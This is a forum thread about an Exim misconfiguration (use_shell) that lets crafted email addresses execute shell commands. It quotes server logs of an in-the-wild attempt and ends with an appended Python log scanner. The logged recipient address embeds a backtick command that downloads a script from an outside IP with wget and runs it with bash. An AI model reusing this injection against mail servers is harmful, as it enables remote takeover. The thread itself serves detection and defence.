Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution

Discussion in 'E-mail Discussion' started by Domenico, May 5, 2013.

  1. Domenico

    Domenico Well-Known Member

    #1 Domenico, May 5, 2013
    Last edited: May 5, 2013
  2. cPanelNick

    cPanelNick Administrator
    Staff Member

    We don't use use_shell in exim.conf. The deficiencies of use_shell are already documented in the Exim documentation, showing this is a security problem when used this way. This is a case of blindly copying the example and not reading the docs that go along with it. It looks like the Exim devs have since made the warning stronger and more fiercely worded.
     
  3. zye

    zye Well-Known Member

    I noticed
    <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com>

    exim_mainlog

    Code:
    2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 08:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 14:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 23:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-06 08:39:39 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-06 17:39:33 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-07 01:40:27 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-07 10:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (111): Connection refused
    
    exim_mainlog:2013-05-05 04:39:03 1UYgRb-0003y5-7t example.com [2001:500:88:200::10] Network is unreachable
    exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t example.com [192.0.43.10] Connection timed out
    exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.co
     
  4. cPanelNick

    cPanelNick Administrator
    Staff Member

    Looks like it's out in the wild now. From the old it looks quite unsuccessful.
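
A defender's check for the kind of log entries quoted in this thread, as an added example that is not part of any post: a Python scan of exim_mainlog lines for addresses carrying shell metacharacters, grouped by message ID. The regexes, the `scan` function and the sample lines are constructed for illustration and assume the main log layout shown above.

```python
import re

# Exim main log layout: "<date> <time> <message-id> <flag> <address> ..."
# Flags: <= arrival, => / -> delivery, == deferral, ** failure.
LINE_RE = re.compile(
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<msgid>[0-9A-Za-z]+-[0-9A-Za-z]+-[0-9A-Za-z]+) "
    r"(?P<flag><=|=>|->|==|\*\*) "
    r"(?P<addr>\S+)"
)
# Characters a shell would interpret if an address reached a command line:
# backticks, $( / ${ expansion, pipes, semicolons, ampersands.
# '&' and ';' can produce false positives on unusual but legitimate addresses.
SHELL_META_RE = re.compile(r"`|\$[({]|[|;&]")


def scan(lines):
    """Return {message-id: {addr, first, last, count}} for suspicious addresses."""
    hits = {}
    for line in lines:
        m = LINE_RE.search(line)  # search() tolerates a "exim_mainlog:" grep prefix
        if not m or not SHELL_META_RE.search(m["addr"]):
            continue
        h = hits.setdefault(
            m["msgid"], {"addr": m["addr"], "first": m["ts"], "count": 0}
        )
        h["last"] = m["ts"]
        h["count"] += 1
    return hits


# Constructed sample lines (not taken from a real server), same shape as the thread's.
SAMPLE = [
    "2013-05-05 04:39:24 1AbCdE-000001-Xy == a`echo${IFS}test`b@example.com "
    "R=lookuphost T=remote_smtp defer (110): Connection timed out",
    "exim_mainlog:2013-05-05 08:39:24 1AbCdE-000001-Xy == a`echo${IFS}test`b@example.com "
    "R=lookuphost T=remote_smtp defer (110): Connection timed out",
    "2013-05-05 09:00:01 1AbCdF-000002-Zz => user@example.com R=lookuphost T=remote_smtp",
]

if __name__ == "__main__":
    for msgid, h in scan(SAMPLE).items():
        print(f"{msgid} {h['addr']} seen {h['count']}x, {h['first']} to {h['last']}")
```

A hit only shows that such an address was submitted; whether anything executed depends on whether a transport on that server passes addresses to a shell, which is what use_shell does.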
     